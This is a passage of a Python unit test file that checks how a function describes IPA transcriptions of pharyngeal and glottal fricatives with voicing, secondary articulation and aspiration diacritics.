actual = describe_transcription("ħ̊ʷ")
self.assertEqual(actual, expected)
def test_ħ̥ʷ_is_the_representation_of_the_voiceless_labialized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ħ̥ʷ")
self.assertEqual(actual, expected)
def test_ʕ̊ʷ_is_the_representation_of_the_voiceless_labialized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ʕ̊ʷ")
self.assertEqual(actual, expected)
def test_ʕ̥ʷ_is_the_representation_of_the_voiceless_labialized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ʕ̥ʷ")
self.assertEqual(actual, expected)
# voiceless palatalized pharyngeal fricative pulmonic egressive consonant
def test_ħʲ_is_the_representation_of_the_voiceless_palatalized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ħʲ")
self.assertEqual(actual, expected)
def test_ħ̊ʲ_is_the_representation_of_the_voiceless_palatalized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ħ̊ʲ")
self.assertEqual(actual, expected)
def test_ħ̥ʲ_is_the_representation_of_the_voiceless_palatalized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ħ̥ʲ")
self.assertEqual(actual, expected)
def test_ʕ̊ʲ_is_the_representation_of_the_voiceless_palatalized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ʕ̊ʲ")
self.assertEqual(actual, expected)
def test_ʕ̥ʲ_is_the_representation_of_the_voiceless_palatalized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ʕ̥ʲ")
self.assertEqual(actual, expected)
# voiceless velarized pharyngeal fricative pulmonic egressive consonant
def test_ħˠ_is_the_representation_of_the_voiceless_velarized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ħˠ")
self.assertEqual(actual, expected)
def test_ħ̊ˠ_is_the_representation_of_the_voiceless_velarized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ħ̊ˠ")
self.assertEqual(actual, expected)
def test_ħ̥ˠ_is_the_representation_of_the_voiceless_velarized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ħ̥ˠ")
self.assertEqual(actual, expected)
def test_ʕ̊ˠ_is_the_representation_of_the_voiceless_velarized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ʕ̊ˠ")
self.assertEqual(actual, expected)
def test_ʕ̥ˠ_is_the_representation_of_the_voiceless_velarized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ʕ̥ˠ")
self.assertEqual(actual, expected)
# voiceless pharyngealized pharyngeal fricative pulmonic egressive consonant
def test_ħˤ_is_the_representation_of_the_voiceless_pharyngealized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ħˤ")
self.assertEqual(actual, expected)
def test_ħ̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ħ̊ˤ")
self.assertEqual(actual, expected)
def test_ħ̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ħ̥ˤ")
self.assertEqual(actual, expected)
def test_ʕ̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ʕ̊ˤ")
self.assertEqual(actual, expected)
def test_ʕ̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ʕ̥ˤ")
self.assertEqual(actual, expected)
# voiceless aspirated pharyngeal fricative pulmonic egressive consonant
def test_ħʰ_is_the_representation_of_the_voiceless_aspirated_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ħʰ")
self.assertEqual(actual, expected)
def test_ʕ̥ʰ_is_the_representation_of_the_voiceless_aspirated_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ʕ̥ʰ")
self.assertEqual(actual, expected)
def test_ʕ̊ʰ_is_the_representation_of_the_voiceless_aspirated_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ʕ̊ʰ")
self.assertEqual(actual, expected)
# voiceless aspirated labialized pharyngeal fricative pulmonic egressive consonant
def test_ħʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ħʰʷ")
self.assertEqual(actual, expected)
def test_ʕ̥ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ʕ̥ʰʷ")
self.assertEqual(actual, expected)
def test_ʕ̊ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ʕ̊ʰʷ")
self.assertEqual(actual, expected)
# voiceless aspirated palatalized pharyngeal fricative pulmonic egressive consonant
def test_ħʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ħʰʲ")
self.assertEqual(actual, expected)
def test_ʕ̥ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ʕ̥ʰʲ")
self.assertEqual(actual, expected)
def test_ʕ̊ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ʕ̊ʰʲ")
self.assertEqual(actual, expected)
# voiceless aspirated velarized pharyngeal fricative pulmonic egressive consonant
def test_ħʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ħʰˠ")
self.assertEqual(actual, expected)
def test_ʕ̥ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ʕ̥ʰˠ")
self.assertEqual(actual, expected)
def test_ʕ̊ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ʕ̊ʰˠ")
self.assertEqual(actual, expected)
# voiceless aspirated pharyngealized pharyngeal fricative pulmonic egressive consonant
def test_ħʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ħʰˤ")
self.assertEqual(actual, expected)
def test_ʕ̥ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ʕ̥ʰˤ")
self.assertEqual(actual, expected)
def test_ʕ̊ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ʕ̊ʰˤ")
self.assertEqual(actual, expected)
# voiced pharyngeal fricative pulmonic egressive consonant
def test_ʕ_is_the_representation_of_the_voiced_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ʕ")
self.assertEqual(actual, expected)
def test_ħ̬_is_the_representation_of_the_voiced_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ħ̬")
self.assertEqual(actual, expected)
def test_ħ̬_is_the_representation_of_the_voiced_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ħ̬")
self.assertEqual(actual, expected)
# voiced labialized pharyngeal fricative pulmonic egressive consonant
def test_ʕʷ_is_the_representation_of_the_voiced_labialized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced labialized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ʕʷ")
self.assertEqual(actual, expected)
def test_ħ̬ʷ_is_the_representation_of_the_voiced_labialized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced labialized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ħ̬ʷ")
self.assertEqual(actual, expected)
def test_ħ̬ʷ_is_the_representation_of_the_voiced_labialized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced labialized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ħ̬ʷ")
self.assertEqual(actual, expected)
# voiced palatalized pharyngeal fricative pulmonic egressive consonant
def test_ʕʲ_is_the_representation_of_the_voiced_palatalized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced palatalized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ʕʲ")
self.assertEqual(actual, expected)
def test_ħ̬ʲ_is_the_representation_of_the_voiced_palatalized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced palatalized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ħ̬ʲ")
self.assertEqual(actual, expected)
def test_ħ̬ʲ_is_the_representation_of_the_voiced_palatalized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced palatalized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ħ̬ʲ")
self.assertEqual(actual, expected)
# voiced velarized pharyngeal fricative pulmonic egressive consonant
def test_ʕˠ_is_the_representation_of_the_voiced_velarized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced velarized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ʕˠ")
self.assertEqual(actual, expected)
def test_ħ̬ˠ_is_the_representation_of_the_voiced_velarized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced velarized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ħ̬ˠ")
self.assertEqual(actual, expected)
def test_ħ̬ˠ_is_the_representation_of_the_voiced_velarized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced velarized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ħ̬ˠ")
self.assertEqual(actual, expected)
# voiced pharyngealized pharyngeal fricative pulmonic egressive consonant
def test_ʕˤ_is_the_representation_of_the_voiced_pharyngealized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ʕˤ")
self.assertEqual(actual, expected)
def test_ħ̬ˤ_is_the_representation_of_the_voiced_pharyngealized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ħ̬ˤ")
self.assertEqual(actual, expected)
def test_ħ̬ˤ_is_the_representation_of_the_voiced_pharyngealized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ħ̬ˤ")
self.assertEqual(actual, expected)
# voiced aspirated pharyngeal fricative pulmonic egressive consonant
def test_ʕʰ_is_the_representation_of_the_voiced_aspirated_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ʕʰ")
self.assertEqual(actual, expected)
def test_ʕ̬ʰ_is_the_representation_of_the_voiced_aspirated_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ʕ̬ʰ")
self.assertEqual(actual, expected)
def test_ħ̬ʰ_is_the_representation_of_the_voiced_aspirated_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ħ̬ʰ")
self.assertEqual(actual, expected)
# voiced aspirated labialized pharyngeal fricative pulmonic egressive consonant
def test_ʕʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ʕʰʷ")
self.assertEqual(actual, expected)
def test_ʕ̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ʕ̬ʰʷ")
self.assertEqual(actual, expected)
def test_ħ̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ħ̬ʰʷ")
self.assertEqual(actual, expected)
# voiced aspirated palatalized pharyngeal fricative pulmonic egressive consonant
def test_ʕʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ʕʰʲ")
self.assertEqual(actual, expected)
def test_ʕ̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ʕ̬ʰʲ")
self.assertEqual(actual, expected)
def test_ħ̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ħ̬ʰʲ")
self.assertEqual(actual, expected)
# voiced aspirated velarized pharyngeal fricative pulmonic egressive consonant
def test_ʕʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ʕʰˠ")
self.assertEqual(actual, expected)
def test_ʕ̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ʕ̬ʰˠ")
self.assertEqual(actual, expected)
def test_ħ̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ħ̬ʰˠ")
self.assertEqual(actual, expected)
# voiced aspirated pharyngealized pharyngeal fricative pulmonic egressive consonant
def test_ʕʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ʕʰˤ")
self.assertEqual(actual, expected)
def test_ʕ̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ʕ̬ʰˤ")
self.assertEqual(actual, expected)
def test_ħ̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ħ̬ʰˤ")
self.assertEqual(actual, expected)
# voiceless glottal fricative pulmonic egressive consonant
def test_h_is_the_representation_of_the_voiceless_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless glottal fricative pulmonic egressive consonant"
actual = describe_transcription("h")
self.assertEqual(actual, expected)
def test_h̊_is_the_representation_of_the_voiceless_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless glottal fricative pulmonic egressive consonant"
actual = describe_transcription("h̊")
self.assertEqual(actual, expected)
def test_h̥_is_the_representation_of_the_voiceless_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless glottal fricative pulmonic egressive consonant"
actual = describe_transcription("h̥")
self.assertEqual(actual, expected)
def test_ɦ̊_is_the_representation_of_the_voiceless_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless glottal fricative pulmonic egressive consonant"
actual = describe_transcription("ɦ̊")
self.assertEqual(actual, expected)
def test_ɦ̥_is_the_representation_of_the_voiceless_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless glottal fricative pulmonic egressive consonant"
actual = describe_transcription("ɦ̥")
self.assertEqual(actual, expected)
# voiceless labialized glottal fricative pulmonic egressive consonant
def test_hʷ_is_the_representation_of_the_voiceless_labialized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("hʷ")
self.assertEqual(actual, expected)
def test_h̊ʷ_is_the_representation_of_the_voiceless_labialized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("h̊ʷ")
self.assertEqual(actual, expected)
def test_h̥ʷ_is_the_representation_of_the_voiceless_labialized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("h̥ʷ")
self.assertEqual(actual, expected)
def test_ɦ̊ʷ_is_the_representation_of_the_voiceless_labialized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("ɦ̊ʷ")
self.assertEqual(actual, expected)
def test_ɦ̥ʷ_is_the_representation_of_the_voiceless_labialized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("ɦ̥ʷ")
self.assertEqual(actual, expected)
# voiceless palatalized glottal fricative pulmonic egressive consonant
def test_hʲ_is_the_representation_of_the_voiceless_palatalized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("hʲ")
self.assertEqual(actual, expected)
def test_h̊ʲ_is_the_representation_of_the_voiceless_palatalized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("h̊ʲ")
self.assertEqual(actual, expected)
def test_h̥ʲ_is_the_representation_of_the_voiceless_palatalized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("h̥ʲ")
self.assertEqual(actual, expected)
def test_ɦ̊ʲ_is_the_representation_of_the_voiceless_palatalized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("ɦ̊ʲ")
self.assertEqual(actual, expected)
def test_ɦ̥ʲ_is_the_representation_of_the_voiceless_palatalized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("ɦ̥ʲ")
self.assertEqual(actual, expected)
# voiceless velarized glottal fricative pulmonic egressive consonant
def test_hˠ_is_the_representation_of_the_voiceless_velarized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("hˠ")
self.assertEqual(actual, expected)
def test_h̊ˠ_is_the_representation_of_the_voiceless_velarized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("h̊ˠ")
self.assertEqual(actual, expected)
def test_h̥ˠ_is_the_representation_of_the_voiceless_velarized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("h̥ˠ")
self.assertEqual(actual, expected)
def test_ɦ̊ˠ_is_the_representation_of_the_voiceless_velarized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("ɦ̊ˠ")
self.assertEqual(actual, expected)
def test_ɦ̥ˠ_is_the_representation_of_the_voiceless_velarized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("ɦ̥ˠ")
self.assertEqual(actual, expected)
# voiceless pharyngealized glottal fricative pulmonic egressive consonant
def test_hˤ_is_the_representation_of_the_voiceless_pharyngealized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("hˤ")
self.assertEqual(actual, expected)
def test_h̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("h̊ˤ")
self.assertEqual(actual, expected)
def test_h̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("h̥ˤ")
self.assertEqual(actual, expected)
def test_ɦ̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("ɦ̊ˤ")
self.assertEqual(actual, expected)
def test_ɦ̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("ɦ̥ˤ")
self.assertEqual(actual, expected)
# voiceless aspirated glottal fricative pulmonic egressive consonant
def test_hʰ_is_the_representation_of_the_voiceless_aspirated_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated glottal fricative pulmonic egressive consonant"
actual = describe_transcription("hʰ")
self.assertEqual(actual, expected)
def test_ɦ̥ʰ_is_the_representation_of_the_voiceless_aspirated_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated glottal fricative pulmonic egressive consonant"
actual = describe_transcription("ɦ̥ʰ")
self.assertEqual(actual, expected)
def test_ɦ̊ʰ_is_the_representation_of_the_voiceless_aspirated_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated glottal fricative pulmonic egressive consonant"
actual = describe_transcription("ɦ̊ʰ")
self.assertEqual(actual, expected)
# voiceless aspirated labialized glottal fricative pulmonic egressive consonant
def test_hʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("hʰʷ")
self.assertEqual(actual, expected)
def test_ɦ̥ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("ɦ̥ʰʷ")
self.assertEqual(actual, expected)
def test_ɦ̊ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("ɦ̊ʰʷ")
self.assertEqual(actual, expected)
# voiceless aspirated palatalized glottal fricative pulmonic egressive consonant
def test_hʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("hʰʲ")
self.assertEqual(actual, expected)
def test_ɦ̥ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("ɦ̥ʰʲ")
self.assertEqual(actual, expected)
def test_ɦ̊ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("ɦ̊ʰʲ")
self.assertEqual(actual, expected)
# voiceless aspirated velarized glottal fricative pulmonic egressive consonant
def test_hʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("hʰˠ")
self.assertEqual(actual, expected)
def test_ɦ̥ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("ɦ̥ʰˠ")
self.assertEqual(actual, expected)
def test_ɦ̊ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("ɦ̊ʰˠ")
self.assertEqual(actual, expected)
# voiceless aspirated pharyngealized glottal fricative pulmonic egressive consonant
def test_hʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("hʰˤ")
self.assertEqual(actual, expected)
def test_ɦ̥ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("ɦ̥ʰˤ")
self.assertEqual(actual, expected)
def test_ɦ̊ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("ɦ̊ʰˤ")
self.assertEqual(actual, expected)
# voiced glottal fricative pulmonic egressive consonant
def test_ɦ_is_the_representation_of_the_voiced_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced glottal fricative pulmonic egressive consonant"
actual = describe_transcription("ɦ")
self.assertEqual(actual, expected)
def test_h̬_is_the_representation_of_the_voiced_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced glottal fricative pulmonic egressive consonant"
actual = describe_transcription("h̬")
self.assertEqual(actual, expected)
def test_h̬_is_the_representation_of_the_voiced_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced glottal fricative pulmonic egressive consonant"
actual = describe_transcription("h̬")
self.assertEqual(actual, expected)
# voiced labialized glottal fricative pulmonic egressive consonant
def test_ɦʷ_is_the_representation_of_the_voiced_labialized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced labialized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("ɦʷ")
self.assertEqual(actual, expected)
def test_h̬ʷ_is_the_representation_of_the_voiced_labialized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced labialized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("h̬ʷ")
self.assertEqual(actual, expected)
def test_h̬ʷ_is_the_representation_of_the_voiced_labialized_glottal_fricative_pulmonic_egressive_consonant(self):
